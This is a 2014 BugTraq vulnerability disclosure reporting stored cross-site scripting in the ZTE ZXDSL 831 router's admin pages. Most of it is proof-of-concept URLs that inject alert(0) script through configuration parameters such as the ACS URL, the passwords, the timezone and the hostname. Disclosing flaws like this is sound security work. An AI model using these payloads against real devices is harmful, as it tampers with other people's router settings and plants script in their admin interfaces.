BugTraq
ZTE ZXDSL 831 Multiple Cross Site Scripting Nov 06 2014 07:45PM
habte yibelo gmail com
TR-069 Client page: Stored. executes when users go to http://192.168.1.1/tr69cfg.html

http://192.168.1.1/tr69cfg.cgi?tr69cInformEnable=1&tr69cInformInterval=4
3200&tr69cAcsURL=http://acs.etc.et:9090/web/tr069%27;alert%280%29;//&tr6
9cAcsUser=cpe&tr69cAcsPwd=cpe&tr69cConnReqUser=itms&tr69cConnReqPwd=itms
&tr69cNoneConnReqAuth=0&tr69cDebugEnable=0

http://192.168.1.1/tr69cfg.cgi?tr69cInformEnable=1&tr69cInformInterval=4
3200&tr69cAcsURL=http://acs.site.et:9090/web/tr069&tr69cAcsUser=cpe%27;a
lert%280%29;//&tr69cAcsPwd=cpe&tr69cConnReqUser=itms&tr69cConnReqPwd=itm
s&tr69cNoneConnReqAuth=0&tr69cDebugEnable=0

http://192.168.1.1/tr69cfg.cgi?tr69cInformEnable=1&tr69cInformInterval=4
3200&tr69cAcsURL=http://acs.site.et:9090/web/tr069&tr69cAcsUser=cpe&tr69
cAcsPwd=cpe%27;alert%280%29;//&tr69cConnReqUser=itms&tr69cConnReqPwd=itm
s&tr69cNoneConnReqAuth=0&tr69cDebugEnable=0

http://192.168.1.1/tr69cfg.cgi?tr69cInformEnable=1&tr69cInformInterval=4
3200&tr69cAcsURL=http://acs.site.et:9090/web/tr069&tr69cAcsUser=cpe&tr69
cAcsPwd=cpe&tr69cConnReqUser=itms&tr69cConnReqPwd=itms%27;alert%280%29;/
/&tr69cNoneConnReqAuth=0&tr69cDebugEnable=0%27;alert%280%29;//

Time and date page (/sntpcfg.sntp) - Persistent

http://192.168.1.1/sntpcfg.sntp?ntp_enabled=0&tmYear=2000%27lol&tmMonth=
01&tmDay=01&tmHour=00&tmMinute=30&timezone_offset=+08:00&timezone=Beijin
g,%20Chongqing,%20Hong%20Kong,%20Urumqi%22;alert%280%29;//&use_dst=0&enb
lLightSaving=0

Quick Stats page:

192.168.1.1/psilan.cgi?action=save&ethIpAddress=192.168.1.1&ethSubnetMas
k=255.255.255.0&hostname=ZXDSL83C1II';alert(0);//&domainname=home&enblUp
np=1&enblLan2=0

http://192.168.1.1/psilan.cgi?action=save&ethIpAddress=192.168.1.1&ethSu
bnetMask=255.255.255.0&hostname=ZXDSL83C1II&domainname=home%27;alert%280
%29;//&enblUpnp=1&enblLan2=0

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus